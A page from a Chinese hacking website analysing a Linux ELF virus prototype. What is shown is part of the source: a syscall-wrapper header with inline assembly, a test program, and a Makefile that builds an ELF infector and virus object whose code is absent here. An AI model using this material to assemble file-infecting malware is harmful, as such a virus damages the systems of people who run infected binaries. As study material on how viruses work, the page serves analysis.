 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 一个Linux病毒原型分析 | |||||
作者:grip2 文章来源:CnXHacker.Net 点击数: 更新时间:2004-12-23  |
|||||
|
#ifndef _G2_SYSCALL_ #define _G2_SYSCALL_ #include #include #include #include #include "gunistd.h" #define NULL 0 struct dirent { long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[256]; /* We must not include limits.h! */ }; struct stat { unsigned long st_dev; unsigned long st_ino; unsigned short st_mode; unsigned short st_nlink; unsigned short st_uid; unsigned short st_gid; unsigned long st_rdev; unsigned long st_size; unsigned long st_blksize; unsigned long st_blocks; unsigned long st_atime; unsigned long st_atime_nsec; unsigned long st_mtime; unsigned long st_mtime_nsec; unsigned long st_ctime; unsigned long st_ctime_nsec; unsigned long __unused4; unsigned long __unused5; }; static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count); static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count); static inline g_syscall3(int, open, const char *, file, int, flag, int, mode); static inline g_syscall1(int, close, int, fd); static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot, int, flags, int, fd, off_t, offset); static inline g_syscall2(int, munmap, void *, addr, size_t, len); static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath); static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf); static inline void * __memcpy(void * to, const void * from, size_t n) { int d0, d1, d2; __asm__ __volatile__( "rep ; movsl\n\t" "testb $2,%b4\n\t" "je 1f\n\t" "movsw\n" "1:\ttestb $1,%b4\n\t" "je 2f\n\t" "movsb\n" "2:" : "=&c" (d0), "=&D" (d1), "=&S" (d2) :"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from) : "memory"); return (to); } #endif /* _G2_SYSCALL_ */ ------------------------------ gsyscall.h ------------------------------ ------------------------------ foo.c ------------------------------ #include int main() { puts("real elf point"); return 0; } ------------------------------ foo.c ------------------------------ ------------------------------ Makefile ------------------------------ all: foo gei gei: g-elf-infector.c gvirus.o gcc -O2 $< gvirus.o -o gei -Wall -DNDEBUG foo: foo.c gcc $< -o foo gvirus.o: gvirus.c gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall -DNDEBUG clean: rm *.o -rf rm foo -rf rm gei -rf ------------------------------ Makefile ------------------------------ |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 如何分级防御针对Linux服务器 活地运用SQL Injection做数据 微软今日发布Windows Live测 微软更新Live Home 加日历和 微软报告称操作系统漏洞 今年 微软携安全厂商建统一战线 M 微软将开放Windows Live网络 Hotmail更新——Windows Liv 警惕:又一个通过 MSN传播的 Windows Live新主页类似Live |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
